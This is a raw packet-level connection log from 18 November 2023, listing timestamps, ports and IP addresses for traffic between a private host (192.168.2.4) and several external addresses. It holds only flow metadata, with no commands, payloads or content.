Nov 18, 2023 10:02:26.253443956 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253460884 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253478050 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253494024 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253499985 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253499985 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253510952 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253526926 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253540993 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253542900 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253560066 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253576994 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253592968 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253599882 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253599882 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253611088 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253628969 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253643990 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253645897 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253664017 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253679991 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253696918 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253704071 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253704071 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253715038 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253732920 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253737926 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253751040 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253767967 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253784895 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253784895 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253803968 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253815889 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253899097 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.390710115 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.390710115 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.424932957 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:26.425044060 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:26.434082985 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:26.687096119 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.692178011 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.732988119 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:26.739888906 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.786740065 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:26.869963884 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:27.168740988 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:27.208717108 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:27.382911921 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:27.383080959 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:27.726654053 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:28.421694040 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:28.421807051 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:28.442025900 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.442065954 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.719218016 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:28.719278097 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:28.738307953 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.744863987 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.744913101 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.744957924 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.744961023 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.744986057 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745027065 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745079994 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745100021 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745116949 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745134115 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745137930 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745176077 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745177031 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745196104 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745215893 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745233059 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745234966 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745270967 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745275974 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745309114 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745326996 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745345116 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745348930 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745367050 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745388031 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745388031 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745404959 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745430946 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745433092 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745446920 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745462894 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745474100 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745481014 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745497942 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745503902 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745515108 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745532990 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745541096 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745551109 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745569944 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745573997 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745587111 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745603085 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745606899 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745620966 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745636940 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745640039 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745697021 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745698929 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745717049 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745733023 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745749950 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745755911 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745765924 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745783091 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745790005 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745800018 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745810032 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745820045 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745836973 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745848894 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745855093 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745871067 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745882988 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745889902 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745909929 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745918989 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745928049 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745945930 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745950937 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745963097 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745980024 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.745986938 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.745996952 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.746012926 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.746018887 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.746030092 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.746046066 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.746054888 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.746063948 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.746085882 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.746085882 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.746104002 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.746121883 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.746129036 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.746138096 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.746154070 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.746161938 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.746170998 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.746187925 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.746191025 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.746206999 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.746225119 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:28.746229887 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:28.746264935 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.044931889 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.044967890 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.044986010 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045003891 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045026064 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045042992 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045063019 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045089006 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.045118093 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045139074 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045156956 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045159101 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.045175076 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045178890 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.045193911 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045207977 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.045254946 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.045454979 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045473099 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045490026 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045507908 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045523882 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.045555115 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.045625925 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045644045 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045661926 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045692921 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.045762062 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045780897 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045798063 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045809031 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.045816898 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045834064 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045842886 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.045851946 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.045883894 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.070348024 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:29.208616972 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.217602968 CET	49739	80	192.168.2.4	149.154.167.99
Nov 18, 2023 10:02:29.254941940 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.254997015 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.513329029 CET	80	49739	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:29.513431072 CET	49739	80	192.168.2.4	149.154.167.99
Nov 18, 2023 10:02:29.551496983 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.556313992 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.614872932 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.660984039 CET	49739	80	192.168.2.4	149.154.167.99
Nov 18, 2023 10:02:29.686839104 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.686892033 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:29.956995964 CET	80	49739	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:29.957020044 CET	80	49739	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:29.960555077 CET	49740	443	192.168.2.4	149.154.167.99
Nov 18, 2023 10:02:29.960609913 CET	443	49740	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:29.960688114 CET	49740	443	192.168.2.4	149.154.167.99
Nov 18, 2023 10:02:29.971322060 CET	49740	443	192.168.2.4	149.154.167.99
Nov 18, 2023 10:02:29.971369982 CET	443	49740	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:29.983222961 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:29.987898111 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:30.002559900 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.099368095 CET	49739	80	192.168.2.4	149.154.167.99
Nov 18, 2023 10:02:30.118556023 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:30.300753117 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.300872087 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.301103115 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.580435991 CET	443	49740	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:30.580506086 CET	49740	443	192.168.2.4	149.154.167.99
Nov 18, 2023 10:02:30.584767103 CET	49740	443	192.168.2.4	149.154.167.99
Nov 18, 2023 10:02:30.584775925 CET	443	49740	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:30.585006952 CET	443	49740	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:30.599070072 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.600006104 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.600019932 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.600033045 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.600049973 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.600063086 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.600076914 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.600085020 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.600090027 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.600102901 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.600116968 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.600131035 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.600182056 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.600182056 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.600182056 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.707803011 CET	49740	443	192.168.2.4	149.154.167.99
Nov 18, 2023 10:02:30.753259897 CET	443	49740	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:30.898447990 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898473978 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898488045 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898502111 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898514032 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898528099 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898540974 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.898565054 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.898571968 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.898590088 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898603916 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898616076 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898628950 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898642063 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898652077 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.898655891 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898669958 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898673058 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.898682117 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898694992 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.898695946 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898710966 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898727894 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.898729086 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898741961 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898753881 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.898755074 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898775101 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:30.898780107 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:30.898814917 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.190604925 CET	443	49740	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:31.190628052 CET	443	49740	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:31.190634966 CET	443	49740	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:31.190659046 CET	443	49740	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:31.190676928 CET	443	49740	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:31.190701008 CET	49740	443	192.168.2.4	149.154.167.99
Nov 18, 2023 10:02:31.190712929 CET	443	49740	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:31.190720081 CET	49740	443	192.168.2.4	149.154.167.99
Nov 18, 2023 10:02:31.190733910 CET	443	49740	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:31.190774918 CET	49740	443	192.168.2.4	149.154.167.99
Nov 18, 2023 10:02:31.200005054 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200021029 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200035095 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200047970 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200061083 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200073957 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200087070 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200103998 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200082064 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200118065 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200129986 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200143099 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200162888 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200167894 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200167894 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200167894 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200175047 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200186968 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200200081 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200213909 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200222015 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200222015 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200226068 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200237036 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200241089 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200248957 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200263977 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200267076 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200278044 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200284004 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200289011 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200300932 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200314045 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200325966 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200339079 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200340033 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200340033 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200352907 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200365067 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200366974 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200383902 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200386047 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200396061 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200407982 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200421095 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200433016 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200433969 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200433016 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200450897 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200464964 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200475931 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200479984 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200489998 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200501919 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200509071 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200515985 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200529099 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.200530052 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200546980 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.200573921 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.204718113 CET	49740	443	192.168.2.4	149.154.167.99
Nov 18, 2023 10:02:31.205604076 CET	49739	80	192.168.2.4	149.154.167.99
